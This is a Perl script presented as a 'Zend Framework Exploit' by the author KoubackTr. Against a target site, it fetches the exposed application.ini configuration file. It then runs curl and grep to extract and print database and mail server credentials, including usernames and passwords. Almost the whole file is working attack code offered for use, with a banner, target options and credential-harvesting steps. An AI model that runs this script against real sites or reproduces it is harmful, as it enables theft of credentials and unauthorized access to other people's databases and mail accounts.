Untitled

#!/usr/bin/perl

# Zend Framework Exploit.
# By KoubackTr
# koubacktr@gmail.com
# http://koubacktr.wordpress.com/


#=====================================================================#
# This script exploits a vulnerability in the Zend Framework          #
# Through the exposure of the configuration file "application.ini"    #
#=====================================================================#
# Este script explora uma vulnerabilidade no Zend Framework           #
# Atravez da exposição do arquivo de configuração "application.ini"   #
#=====================================================================#

# Status: Em teste e adaptação  // In test and adaptation


# Libs
use strict;
use LWP::UserAgent;
use Getopt::Long;
use Config;
use Term::ANSIColor;

my $os=$Config{osname};

if($os=="linux"){

}else{
print "Ohh, this software run only in linux systems :( [DIE]\n";
die;
}

print color 'bold cyan';
print '
__________                 .___         ____  ___      .__         ____  __
\____    /____   ____    __| _/    ____ \   \/  /_____ |  |   ____/_   |/  |_
  /     // __ \ /    \  / __ |   _/ __ \ \     /\____ \|  |  /  _ \|   \   __\
 /     /\  ___/|   |  \/ /_/ |   \  ___/ /     \|  |_> >  |_(  <_> )   ||  |
/_______ \___  >___|  /\____ |    \___  >___/\  \   __/|____/\____/|___||__|
        \/   \/     \/      \/        \/      \_/__|
by KoubackTr || http://koubacktr.wordpress.com/

';
print color 'reset';

my ($target, $zend_path);
my $options = GetOptions(
   't=s'=> \$target,
   'p=s'=> \$zend_path,
);

unless($target){
print color 'yellow';
print "\t\t\t[!] Please, set a Zend target!\n";
print "\t\t\tUse EX: $0 -t <target> -p <zend/path/>\n\n";
exit;
print color 'reset';

}
unless($zend_path){
 my $zend_path="/";
}

my $APP="application.ini";
my $PATH="application/configs";

my $URL="http://$target/$zend_path/$PATH/$APP"; #// make a complete URL of application.ini

my $u = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $URL);
my $resposta = $u->request($req);

if($resposta->is_success){

print color 'red';
print "\t\t\t[+] TARGET IS VULNERABLE !! :)\n";
print color 'reset';
print "\t\t\t[+] EXPLORE DB CONFIG IN FILE... !! :)\n\n";

#// using curl for requet application.ini

my $db_host= `curl -s "$URL" | grep 'db.params.host'`;
my $db_adapter=`curl -s "$URL" | grep 'db.adapter' `;
my $db_user=`curl -s "$URL" | grep '.db.params.username' `;
my $db_pass=`curl -s "$URL" | grep '.db.params.password' `;
my $db_name=`curl -s "$URL" | grep 'db.params.dbname' `;
my $db_geral=`curl -s "$URL"| grep 'connection_string' `;

#// Return and print config data
print color 'cyan';
print "\t$db_adapter \n";
print "\t$db_host    \n";
print "\t$db_user    \n";
print "\t$db_pass    \n";
print "\t$db_name    \n";
print "\n$db_geral   \n";
print color 'reset';

print "\n";
print "\t\t\t[+] EXPLORE MAIL CONFIG IN FILE... !! :)\n\n";


my $mail_type=`curl -s "$URL" | grep 'mail.transport.type' `;
my $mail_host= `curl -s "$URL" | grep 'mail.transport.host'`;
my $mail_port=`curl -s "$URL" | grep 'mail.transport.port' `;
my $mail_user=`curl -s "$URL" | grep '.mail.transport.username' `;
my $mail_pass=`curl -s "$URL" | grep 'mail.transport.password' `;

print color 'cyan';
print "\t$mail_type \n";
print "\t$mail_host    \n";
print "\t$mail_port    \n";
print "\t$mail_user    \n";
print "\t$mail_pass    \n";

print color 'reset';

print "\n\n END!\n";


# Make a new request for get new lines and configuration of file. :p
# ...

}
else{
#// The target is not vulnerable, sorry
print color 'bold green';
print "\t\t\t\n[!] TARGET IS NOT VULNERABLE :(  (BYE)\n\n";
print color 'reset';
}


# END #

#
#  KoubackTr - 2014 http://twitter.com/kouback_tr_
#  irc.anonnet.org 6667 #Loc
#